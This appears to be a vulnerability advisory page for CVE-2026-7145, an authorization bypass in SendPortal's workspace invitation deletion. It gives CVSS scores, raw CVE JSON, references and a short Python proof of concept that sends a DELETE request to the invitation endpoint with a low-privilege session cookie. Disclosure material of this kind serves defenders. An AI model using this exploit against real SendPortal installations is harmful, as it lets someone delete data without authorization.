Security Vulnerability Report
中文
CVE-2026-7145 CVSS 5.4 MEDIUM

CVE-2026-7145

Published: 2026-04-27 18:16:57
Last Modified: 2026-04-27 18:35:54
Source: [email protected]

Description

A weakness has been identified in mettle sendportal up to 3.0.1. Affected is the function destroy of the file app/Http/Controllers/Workspaces/WorkspaceInvitationsController.php of the component Invitation Handler. This manipulation of the argument invitation causes authorization bypass. The attack may be initiated remotely. The project was informed of the problem early through an issue report but has not responded yet.

CVSS Details

CVSS Score
5.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Mettle Sendportal <= 3.0.1

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests def check_auth_bypass(target_url, session_cookie, invitation_id): """ PoC for CVE-2026-7145 Attempts to delete an invitation without proper authorization. """ headers = { "Cookie": f"sendportal_session={session_cookie}", "User-Agent": "CVE-2026-7145-Scanner" } # The endpoint vulnerable to authorization bypass delete_url = f"{target_url}/workspaces/invitations/{invitation_id}" try: response = requests.delete(delete_url, headers=headers, timeout=10) if response.status_code == 200 or response.status_code == 204: return f"[+] Vulnerability confirmed! Invitation {invitation_id} deleted bypassing auth." elif response.status_code == 403 or response.status_code == 401: return "[-] Authorization check passed, not vulnerable." else: return f"[?] Unexpected response code: {response.status_code}" except Exception as e: return f"[!] Error: {str(e)}" # Usage # target = "http://localhost:8000" # s_cookie = "valid_low_priv_user_cookie" # target_inv_id = "1" # print(check_auth_bypass(target, s_cookie, target_inv_id))

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-7145", "sourceIdentifier": "[email protected]", "published": "2026-04-27T18:16:56.753", "lastModified": "2026-04-27T18:35:53.583", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "A weakness has been identified in mettle sendportal up to 3.0.1. Affected is the function destroy of the file app/Http/Controllers/Workspaces/WorkspaceInvitationsController.php of the component Invitation Handler. This manipulation of the argument invitation causes authorization bypass. The attack may be initiated remotely. The project was informed of the problem early through an issue report but has not responded yet."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:N/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "NONE", "vulnConfidentialityImpact": "NONE", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:L", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 2.5}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:S/C:N/I:P/A:P", "baseScore": 5.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "SINGLE", "confidentialityImpact": "NONE", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "MEDIUM", "exploitabilityScore": 8.0, "impactScore": 4.9, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-285"}, {"lang": "en", "value": "CWE-639"}]}], "references": [{"url": "https://github.com/mettle/sendportal/", "source": "[email protected]"}, {"url": "https://github.com/mettle/sendportal/issues/337", "source": "[email protected]"}, {"url": "https://vuldb.com/submit/801781", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359744", "source": "[email protected]"}, {"url": "https://vuldb.com/vuln/359744/cti", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.